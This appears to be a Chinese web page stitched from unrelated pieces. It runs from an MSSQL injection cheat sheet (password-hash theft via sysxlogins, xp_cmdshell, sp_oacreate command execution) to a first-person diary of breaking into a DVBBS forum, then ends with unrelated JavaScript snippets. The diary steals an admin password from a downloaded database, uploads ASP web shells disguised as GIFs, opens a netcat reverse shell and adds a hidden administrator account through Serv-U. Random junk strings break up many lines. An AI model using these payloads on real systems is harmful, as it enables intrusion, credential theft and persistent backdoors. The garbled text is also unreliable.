s=192.168.0.1,1433;,select * from table2) select * from database..table2
复制哈西表(HASH)登录_blank>密码的hash存储于sysxlogins中。方法如下:
insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,s
elect * from _blank>_sysxlogins) select * from database.dbo.sysxlogins
得到hash之后,就可以进行暴力破解。
遍历目录的方法: 先创建一个临时表:temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3
nvarchar(255));–
;insert temp exec master.dbo.xp_blank>_availablemedia;– 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_blank>_subdirs c:\;– 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\;– 获得所有子目录
的目录树结构,并寸入temp表中
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell type c:\web\index.asp;-
– 查看某个文件的内容
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\;–
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\ *.asp /s/a;–
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell cscript C:\Inetpub\Admin
Scripts\adsutil.vbs enum w3svc
;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\;– (xp_blank>_
dirtree适用权限PUBLIC)
写入表:
语句1:and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin));–
语句2:and 1=(SELECT IS_blank>_SRVROLEMEMBER(serveradmin));–
语句3:and 1=(SELECT IS_blank>_SRVROLEMEMBER(setupadmin));–
语句4:and 1=(SELECT IS_blank>_SRVROLEMEMBER(securityadmin));–
语句5:and 1=(SELECT IS_blank>_SRVROLEMEMBER(securityadmin));–
语句6:and 1=(SELECT IS_blank>_SRVROLEMEMBER(diskadmin));–
语句7:and 1=(SELECT IS_blank>_SRVROLEMEMBER(bulkadmin));–
语句8:and 1=(SELECT IS_blank>_SRVROLEMEMBER(bulkadmin));–
语句9:and 1=(SELECT IS_blank>_MEMBER(db_blank>_owner));–
把路径写到表中去:
;create table dirs(paths varchar(100), id int)–
;insert dirs exec master.dbo.xp_blank>_dirtree c:\–
and 0<>(select top 1 paths from dirs)–
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))–
;create table dirs1(paths varchar(100), id int)–
;insert dirs exec master.dbo.xp_blank>_dirtree e:\web–
and 0<>(select top 1 paths from dirs1)–
把_blank>数据库备份到网页目录:下载
;declare @a sysname; set @a=db_blank>_name();backup database @a to disk
=e:\web\down.bak;–
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where
xtype=char(85)) T order by id desc)
and 1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN)
,1) from sysobjects) 参看相关表。
and 1=(select user_blank>_id from USER_blank>_LOGIN)
and 0=(select user from USER_blank>_LOGIN where user>1)
-=- wscript.shell example -=-
declare @o int
exec sp_blank>_oacreate wscript.shell, @o out
exec sp_blank>_oamethod @o, run, NULL, notepad.exe
; declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>
_oamethod @o, run, NULL, notepad.exe–
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_blank>_oacreate scripting.filesystemobject, @o out
exec sp_blank>_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
exec @ret = sp_blank>_oamethod @f, readline, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_blank>_oamethod @f, readline, @line out
end
declare @o int, @f int, @t int, @ret int
exec sp_blank>_oacreate scripting.filesystemobject, @o out
exec sp_blank>_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
exec @ret = sp_blank>_oamethod @f, writeline, NULL,
<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
declare @o int, @ret int
exec sp_blank>_oacreate speech.voicetext, @o out
exec sp_blank>_oamethod @o, register, NULL, foo, bar
exec sp_blank>_oasetproperty @o, speed, 150
exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong
to,us, 528
waitfor delay 00:00:05
; declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out
exec sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetp
roperty @o, speed, 150 exec sp_blank>_oamethod @o, speak, NULL, all your
sequel servers are belong to us, 528 waitfor delay 00:00:05–
xp_blank>_dirtree适用权限PUBLIC
exec master.dbo.xp_blank>_dirtree c:\
返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
create table dirs(paths varchar(100), id int)
建表,这里建的表是和上面xp_blank>_dirtree相关连,字段相等、类型相同。
insert dirs exec master.dbo.xp_blank>_dirtree c:\
只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!
怎样进行攻击?
第一步:隐藏自已的位置

  普通攻击者都会利用别人的电脑隐藏他们真实的IP地址。老练的攻击者还会利用800电话的无人转接服务联接ISP,然后再盗用他人的帐号上网。

  第二步:寻找目标主机并分析目标主机

  攻击者首先要寻找目标主机并分析目标主机。在Internet上能真正标识主机的是IP地址,域名是为了便于记忆主机的IP地址而另起的名字,只要利用域名和IP地址就可以顺利地找到目标主机。当然,知道了要攻击目标的位置还是远远不够的,还必须将主机的操作系统类型及其所提供服务等资料作个全面的了解。此时,攻击者们会使用一些扫描器工具,轻松获取目标主机运行的是哪种操作系统的哪个版本,系统有哪些帐户,WWW、FTP、Telnet 、SMTP等服务器程序是何种版本等资料,为入侵作好充分的准备。

  第三步:获取帐号和密码,登录主机

  攻击者要想入侵一台主机,首先要有该主机的一个帐号和密码,否则连登录都无法进行。这样常迫使他们先设法盗窃帐户文件,进行破解,从中获取某用户的帐户和口令,再寻觅合适时机以此身份进入主机。当然,利用某些工具或系统漏洞登录主机也是攻击者常用的一种技法。

  第四步:获得控制权

  攻击者们用FTP、Telnet等工具利用系统漏洞进入进入目标主机系统获得控制权之后,就会做两件事:清除记录和留下后门。他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程操纵程序,以便日后可以不被觉察地再次进入系统。大多数后门程序是预先编译好的,只需要想办法修改时间和权限就可以使用了,甚至新文件的大小都和原文件一模一样。攻击者一般会使用rep传递这些文件,以便不留下FTB记录。清除日志、删除拷贝的文件等手段来隐藏自己的踪迹之后,攻击者就开始下一步的行动。

  第五步:窃取网络资源和特权

  攻击者找到攻击目标后,会继续下一步的攻击。如:下载敏感信息;实施窃取帐号密码、信用卡号等经济偷窃;使网络瘫痪。而好的黑客会通知管理员修补相关漏洞
哈~发现一迷信网站,不爽… 2%D^>`
(入侵需要理由吗?不需要吗?需要吗?….) d>AU<>%E
/=?rXc?2~
用 }O]]?@
telnet www.xxx.com 80 ]je#PDP#+@
$g_TCdN%
get enter 2NIxjNc9
+$21
HTTP/1.1 400 Bad Request $S<Ad[d Server: Microsoft-IIS/5.0 <dzSf~~5 Date: Wed, 08 Jun 2005 11:56:00 GMT @C5p9opPw Content-Type: text/html [d*v`)S Content-Length: 87 ZQ4]-VA|q \&g47e18 ,@@TSZ /DL$;mCs MHl4v 失去了跟主机的连接。 T[Hs5% MsYf|vO1] F:\Documents and Settings\lu\桌面> <("B&{ z^B~UtC T 看到没,获得很多有用的信息哦 qQ +' z57$ r0(}y>a.
先去WEB上看看有没有什么漏洞 }w4z+n.f
\h”{Ic”M
哈!发现DVBBS7.1 论坛 9:9!V+3q
U7ho-5
前几天有朋友告诉我件事情,说有许多白痴管理员用备分的日期做备分数据库的名字哦!试试看! d430N 
H;m+WTD_
dvbbs7.1 是4月6日更新的,他用该用200504**.mdb做名字来命名以前的旧数据库! 4(PhCqoJ
没办法,试试! 7 cHp,8+=
;sDnAxwy
http://www.xxxx.com/bbs/databackup/20050406.mdb gOq+5Yy^
http://www.xxxx.com/bbs/databackup/20050407.mdb b`wQB9
http://www.xxxx.com/bbs/databackup/20050408.mdb .%[~| 8
….. x~jzv@
晕..到32了还没出来 e-x=0@ n
管理员不是白痴哦! \L3OU#
http://www.xxxx.com/bbs/databackup/200504.mdb EC;db;v#
faint!他不是白痴谁是! >dPpsn
跳出了可爱的下载对话框! u>60.l!
|L MsP^J
downloading…. 完成! >7V9OK2
I2#W|>?b
用辅臣数据库浏览器打开,选择Dv_Log(2586) W\if~t2j
字段名选择l_content 关键字添password2 =&@VICGN&
%M1bBX J
点查询 Ix >WSP[GS
许多信息出来了哦! -P !)Z=/~
经过筛选 |d||”WlV2
发现一条: FxvX’h >
oldusername=%B5%F0%B7%C0&username2=%B5%F0%B7%C0&password2=19841202&adduser=%B5%F0%B7%C0&id=12&Submit=%B8%FC+%D0%C2 “N@S/
27s’;ji
哈,想到什么了?登陆啊,不过用户名不知道,是%B8%F0%B7%C9吗~开玩笑,那简单,其实转化这个我用他本身的页面,  +jZ|J
在登陆页面上用户名和密码乱添 ,U=M! \]
点登陆 fFI=M^xO4Y
http://www.xxx.com/bbs/showerr.asp?BoardID=0&ErrCodes=10,11&action=%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2 Q~cn<m] (o.}Q}DSA %CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2这句话意思是“填写登录信息” Yz7eF1x !_`SqqZZ 那么就把%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2换成%B5%F0%B7%C0! TVyRR/v# ) +Q0 = 提交!看到了吧!用户名是“叼防” >#Cee\
晕! Z %”Uj$r
什么名字啊!不管了,登陆! Eq? @x x)
成功!呵呵~把老兵的asp站长助手另存为admin_system321.gif ?D: niF#
|W+5$sb:q
上传! }{TF[YoH
AT0EEooy
晕! >`gl:E*!
U8X&,*e
一流信息监控系统提醒您:很抱歉,由于您提交的内容中或访问的内容中含有系统不允许的关键词或者您的IP受到了访问限制,本次操作无效,系统已记录您的IP及您提交的所有数据。请注意,不要提交任何违反国家规定的内容!本次拦截的相关信息为:drop table K%o75rX
q@EsQiM^p
换海阳top的传,在晕…还是被拦截! mbXofZeV
mzrGxLy\E
不行!我就不信上不去! J([7 MO
1<6`Dm>M^0
*W2X5n
]f8Hu%}
p!NtOL/’F
Po9tauC&
RW-j#bK, I
<\>WJgGkV
rsN,nw
O4! DM
Xa0f\|q
<%On Error Resume Next CuA}v+(yF’
if request(“cmdx”)=”cmd.exe” then *eL|unv
response.write oScriptlhn.exec(“cmd.exe /c”&request(“cmd”)).stdout.readall >R. su,H\
end if gEljQ
response.write oScriptlhn.exec(request(“cmdx”)&” /c”&request(“cmd”)).stdout.readall Su ]<'6!
%> 7c{7+\jF
R!guh#
j\?hM^c0T7
保存成为cmd.gif ‘-c4]v>
上传成功! 5.>L$F/
登陆后台用数据库管理还原成根目录下的admin_system321.asp M7( \&{py
> !s.V.>r
_system321.asp”>http://www.xxx.com/bbs/admin_system321.asp )’`!hC
`d-=_l-
登陆,啊…CMD窗口那里显示 ZO}7lfS{
^V2FgWc
无法找到该页 4I+EF-Tg
您正在搜索的页面可能已经删除、更名或暂时不可用。 ->t$.<:7r= --------------------------------------------------------------------------------  K0;iD=c ,+3Ti&O7e 请尝试以下操作: W~h.; vN O~(GH s b 确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。 yB_.;/#D 如果通过单击链接而到达了该网页,请与网站管理员联系,通知他们该链接的格式不正确。 f^MfD^N{J 单击后退按钮尝试另一个链接。 Pj8Wp5{p) HTTP 错误 404 - 文件或目录未找到。 `ABW:ghX Internet 信息服务 (IIS) _79yt"< t+;lT^ -------------------------------------------------------------------------------- eb@.zmsJ\K 1JSAI \U?Q 技术信息(为技术支持人员提供) >#mlz2;
\ZaqyB
转到 Microsoft 产品支持服务并搜索包括“HTTP”和“404”的标题。 ]X7″vgQ+
打开“IIS 帮助”(可在 IIS 管理器 (inetmgr) 中访问),然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。 we ^fkW
|,wE|pqM}
把我的SYSTEM32下的CMD.exe用记事本打开,另存为111.gif上传! =t4aHU
在用刚才的方法备分成跟目录下的cmd.exe F^
4( %y-u/
把刚才cmd.gif里cmd.exe改成他的绝对路径  +OeK
m:vw2P+z
全都上传!然后备分! I ob}]BQv
访问_system321.asp”>http://www.xxx.com/bbs/admin_system321.asp Ks9g Ac`
哈!成功! [TsA-u `4
在用上面的方法把nc传上去! ATzU7< TOy 本地命令提示符执行 nc -vv -l -p 9999 .!bhM'#! 在webshell里执行nc.exe -e cmd.exe 自己IP 9999 l0 7Ygg*y NC监听的窗口就出现一个可爱的SHELL 8E m{OJA o=jp&k50 在写个文件如下 ^R X=H+Foj (C{#O&j[V echo USER LocalAdministrator>2.txt b *\QTP5U}
echo PASS #l@$ak#.lk;0@P>>2.txt ~Vz[Q;3}
echo SITE MAINTENANCE>>2.txt dY&61-.wO
echo -setdomain>>2.txt 1:6’dX
echo -Domain=MyFTP^|0.0.0.0^|22^|-1^|1^|0 >>2.txt wfgE 3@2l
echo -DynDNSEnable=0 >>2.txt ^+7T\RO_
echo DynIPName=>>2.txt %i* 3~I
echo -SETUSERSETUP>>2.txt r(eKJee
echo -IP=0.0.0.0>>2.txt ;z[61x
echo -PortNo=22>>2.txt |+ ~/”
echo -User=tyrant>>2.txt #;MW*[_n?
echo -Password=19851011>>2.txt zMl6D2`
echo -HomeDir=c:\>>2.txt iq%KCch(,
echo -Maintenance=System>>2.txt 8tqo*y
echo -Ratios=None>>2.txt m|w|b&G
echo Access=c:\^|RWAMEICDP>>2.txt , )+d}<4 echo -GETUSERSETUP>>2.txt i^ x[dXP
I;X3-XOg=L
“^”符号的作用相信大家都了解吧!我不罗嗦了。 /h{7’Re8
G:y0X)]
把上面批处理保存为1.txt qly4
7_~`?9(
在SHELL中用NC提交 4,1 fEnbfQ
L)K 1O]H
nc 127.0.0.1 43958 <1.txt ;vOF]pa.Y m1Kk#m < 回显发现 [s8v9d^q hizkElY 220 Domain settings saved ?$=]Z%[K[ 200-User=test1 LkZ^ ]h_* 200 User settings saved U%zPFx;yH *T}}U=/b 成功了!成功添加了用户tyrant密码19851011 ]Oh8gFkv v*^FeD$h 登陆对方的ftp +XE!`0a 转到system32文件夹下 KrjZZt x+\7?NNAva quote site exec "net.exe user tyrant 19851011 /add" b?ZqY-@< ')R9Q quote site exec "net.exe localgroup administrators tyrant /add" O[Qjij vALL quote site exec "net.exe user start telnet" J8; \sy p[*814;?$ 用tyrant管理员telnet上去 KhfGtp 传个批处理开3389 u^P}F"274 BB.b1 3E 哈...正在连接到...

常用的一些javascript小技巧


+A 全部选择 提示:你可先修改部分代码,再按运行]
//获得控件的绝对位置(2)
oRect = obj.getBoundingClientRect();
oRect.left
oRect.
//打印分页

page1

page2


+A 全部选择 提示:你可先修改部分代码,再按运行]
//自带的打印预览
WebBrowser.ExecWB(1,1) 打开
Web.ExecWB(2,1) 关闭现在所有的IE窗口,并打开一个新窗口
Web.ExecWB(4,1) 保存网页
Web.ExecWB(6,1) 打印
Web.ExecWB(7,1) 打印预览
Web.ExecWB(8,1) 打印页面设置
Web.ExecWB(10,1) 查看页面属性
Web.ExecWB(15,1) 好像是撤销,有待确认
Web.ExecWB(17,1) 全选
Web.ExecWB(22,1) 刷新
Web.ExecWB(45,1) 关闭窗体无提示







//去掉打印时的页眉页脚
[CODE]<script  language=”JavaScript”>   <br/>var HKEY_Root,HKEY_Path,HKEY_Key; <br/>HKEY_Root=”HKEY_CURRENT_USER”; <br/>HKEY_Path=”\\Software\\Microsoft\\Internet Explorer\\PageSetup\\”; <br/>//设置网页打印的页眉页脚为空 <br/>function PageSetup_Null() <br/>{ <br/> try <br/> { <br/>         var Wsh=new ActiveXObject(“WScript.Shell”); <br/>  HKEY_Key=”header”; <br/>  Wsh.RegWrite(HKEY_Root+HKEY_Path+HKEY_Key,””); <br/>  HKEY_Key=”footer”; <br/>  Wsh.RegWrite(HKEY_Root+HKEY_Path+HKEY_Key,””); <br/> } <br/> catch(e){} <br/>} <br/>//设置网页打印的页眉页脚为默认值 <br/>function  PageSetup_Default() <br/>{   <br/> try <br/> { <br/>  var Wsh=new ActiveXObject(“WScript.Shell”); <br/>  HKEY_Key=”header”; <br/>  Wsh.RegWrite(HKEY_Root+HKEY_Path+HKEY_Key,”&w&b页码,&p/&P”); <br/>  HKEY_Key=”footer”; <br/>  Wsh.RegWrite(HKEY_Root+HKEY_Path+HKEY_Key,”&u&b&d”); <br/> } <br/> catch(e){} <br/>} <br/></script> <br/><input type=”button” value=”清空页码” onclick=PageSetup_Null()> <br/><input type=”button” value=”恢复页码” onclick=PageSetup_Default()> <br/>
+A 全部选择 提示:你可先修改部分代码,再按运行]
//无模式的提示框
function modelessAlert(Msg)
{
window.showModelessDialog(“javascript:alert(\””+escape(Msg)+”\”);window.close();”,””,”status:no;resizable:no;help:no;dialogHeight:height:30px;dialogHeight:40px;”);
}
//下载文件
function DownURL(strRemoteURL,strLocalURL)
{
try
{
var xmlHTTP=new ActiveXObject(“Microsoft.XMLHTTP”);
xmlHTTP.open(“Get”,strRemoteURL,false);
xmlHTTP.send();
var adodbStream=new ActiveXObject(“ADODB.Stream”);
adodbStream.Type=1;//1=adTypeBinary
adodbStream.Open();
adodbStream.write(xmlHTTP.responseBody);
adodbStream.SaveToFile(strLocalURL,2);
adodbStream.Close();
adodbStream=null;
xmlHTTP=null;
}
catch(e)
{
window.confirm(“下载URL出错!”);
}
//window.confirm(“下载完成.”);
}
//检验连接是否有效
function getXML(URL)
{
var xmlhttp = new ActiveXObject(“microsoft.xmlhttp”);
xmlhttp.Open(“GET”,URL, false);
try
{
xmlhttp.Send();
}
catch(e){}
finally
{
var result = xmlhttp.responseText;
if(result)
{
if(xmlhttp.Status==200)
{
return(true);
}
else
{
return(false);
}
}
else
{
return(false);
}
}
}
//检查网页是否存在
function CheckURL(URL)
{
var xmlhttp = new ActiveXObject(“Microsoft.XMLHTTP”);
xmlhttp.Open(“GET”,URL, false);
try
{
xmlhttp.Send();
var result = xmlhttp.status;
}
catch(e) {return(false); }
if(result==200)
{
return true;
}
xmlhttp = null;
return false;
}
//禁止FSO
1.注销组件
regsvr32 /u scrrun.dll
2.修改PROGID
HKEY_CLASSES_ROOT\Scripting.FileSystemObject
Scripting.FileSystemObject
3.对于使用object的用户,修改HKEY_CLASSES_ROOT\Scripting.
[/CODE]